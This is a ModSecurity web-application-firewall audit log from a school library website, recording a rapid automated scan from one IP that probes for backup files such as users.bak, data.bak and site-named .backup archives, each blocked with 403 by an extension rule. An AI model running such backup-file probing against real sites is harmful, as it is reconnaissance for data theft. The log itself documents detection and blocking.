aClnLkPRqak7bVuUS6cRhQAAAIM 103.236.140.4 53778 103.236.140.4 8181 --a0855342-B-- GET /clients.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118849545 --a0855342-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a0855342-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854483433 2762 (- - -) Stopwatch2: 1747543854483433 2762; combined=557, p1=270, p2=268, p3=0, p4=0, p5=19, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0855342-Z-- --d5dbe717-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc3wAAAMY 103.236.140.4 54044 103.236.140.4 8181 --d5dbe717-B-- GET /2011.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117876114 --d5dbe717-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d5dbe717-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854495596 2170 (- - -) Stopwatch2: 1747543854495596 2170; combined=600, p1=228, p2=350, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5dbe717-Z-- --ea89573a-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc2wAAANE 103.236.140.4 53774 103.236.140.4 8181 --ea89573a-B-- GET /website.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 OPR/56.0.3051.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 125843574 --ea89573a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ea89573a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854486288 11604 (- - -) Stopwatch2: 1747543854486288 11604; combined=613, p1=281, p2=309, p3=0, p4=0, p5=23, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea89573a-Z-- --ac267316-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc4QAAAMk 103.236.140.4 54052 103.236.140.4 8181 --ac267316-B-- GET /2018.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150142979 --ac267316-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac267316-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854496482 6095 (- - -) Stopwatch2: 1747543854496482 6095; combined=719, p1=298, p2=372, p3=0, p4=0, p5=48, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac267316-Z-- --d499cb5a-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc9QAAAM0 103.236.140.4 54200 103.236.140.4 8181 --d499cb5a-B-- GET /2013.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150437891 --d499cb5a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d499cb5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854503664 5126 (- - -) Stopwatch2: 1747543854503664 5126; combined=422, p1=188, p2=204, p3=0, p4=0, p5=29, sr=42, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d499cb5a-Z-- --48a11625-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DtgAAAFI 103.236.140.4 54848 103.236.140.4 8181 --48a11625-B-- GET /jsp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 119046150 --48a11625-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48a11625-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854507591 7292 (- - -) Stopwatch2: 1747543854507591 7292; combined=548, p1=322, p2=207, p3=0, p4=0, p5=19, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48a11625-Z-- --72529759-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DtwAAAFg 103.236.140.4 54864 103.236.140.4 8181 --72529759-B-- GET /engine.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/52.0.2871.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127491165 --72529759-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --72529759-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854513623 1941 (- - -) Stopwatch2: 1747543854513623 1941; combined=732, p1=366, p2=328, p3=0, p4=0, p5=38, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72529759-Z-- --756b6724-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DxgAAAE0 103.236.140.4 53718 103.236.140.4 8181 --756b6724-B-- GET /2010.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 147879198 --756b6724-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --756b6724-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854507612 12645 (- - -) Stopwatch2: 1747543854507612 12645; combined=544, p1=337, p2=187, p3=0, p4=0, p5=20, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --756b6724-Z-- --f0e20d10-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DywAAAEo 103.236.140.4 54850 103.236.140.4 8181 --f0e20d10-B-- GET /data.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118075868 --f0e20d10-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0e20d10-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854507740 13438 (- - -) Stopwatch2: 1747543854507740 13438; combined=562, p1=286, p2=250, p3=0, p4=0, p5=26, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0e20d10-Z-- --0e323147-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5DyAAAAEg 103.236.140.4 53716 103.236.140.4 8181 --0e323147-B-- GET /home.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149848067 --0e323147-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0e323147-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854490735 32225 (- - -) Stopwatch2: 1747543854490735 32225; combined=693, p1=387, p2=285, p3=0, p4=0, p5=21, sr=157, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e323147-Z-- --9d9c2728-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5D1wAAAEE 103.236.140.4 53926 103.236.140.4 8181 --9d9c2728-B-- GET /2019.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.8.0) Gecko/20100101 Firefox/52.8.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118816777 --9d9c2728-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9d9c2728-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854490630 37701 (- - -) Stopwatch2: 1747543854490630 37701; combined=579, p1=312, p2=242, p3=0, p4=0, p5=25, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d9c2728-Z-- --19568633-A-- [18/May/2025:11:50:54 +0700] aClnLkPRqak7bVuUS6cRyQAAAJQ 103.236.140.4 54980 103.236.140.4 8181 --19568633-B-- GET /users.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.1.1) Gecko/20100101 Firefox/52.1.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152240131 --19568633-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --19568633-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854531232 4662 (- - -) Stopwatch2: 1747543854531232 4662; combined=1119, p1=500, p2=439, p3=0, p4=0, p5=180, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19568633-Z-- --ecaae655-A-- [18/May/2025:11:50:54 +0700] aClnLhir-GlPrFVVKe5D5wAAAEM 103.236.140.4 54942 103.236.140.4 8181 --ecaae655-B-- GET /orders.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5; rv:59.0.2) Gecko/20100101 Firefox/59.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634502 --ecaae655-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ecaae655-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854527155 8905 (- - -) Stopwatch2: 1747543854527155 8905; combined=578, p1=268, p2=287, p3=0, p4=0, p5=23, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecaae655-Z-- --904df951-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxc4wAAAMI 103.236.140.4 54062 103.236.140.4 8181 --904df951-B-- GET /smkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149690336 --904df951-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --904df951-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854496606 41967 (- - -) Stopwatch2: 1747543854496606 41967; combined=1571, p1=329, p2=1210, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --904df951-Z-- --7262dd5c-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxdAwAAAMw 103.236.140.4 53770 103.236.140.4 8181 --7262dd5c-B-- GET /smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127933779 --7262dd5c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7262dd5c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854693149 2166 (- - -) Stopwatch2: 1747543854693149 2166; combined=780, p1=391, p2=359, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7262dd5c-Z-- --0fa19329-A-- [18/May/2025:11:50:54 +0700] aClnLlewLfDrCkDGIGxdBAAAAMY 103.236.140.4 53770 103.236.140.4 8181 --0fa19329-B-- GET /backups.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:66.0.4) Gecko/20100101 Firefox/66.0.4 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127933782 --0fa19329-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0fa19329-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543854702017 1718 (- - -) Stopwatch2: 1747543854702017 1718; combined=673, p1=325, p2=322, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fa19329-Z-- --dc00b86e-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdCAAAAMs 103.236.140.4 54025 103.236.140.4 8181 --dc00b86e-B-- GET /2016.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123254648 --dc00b86e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dc00b86e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag 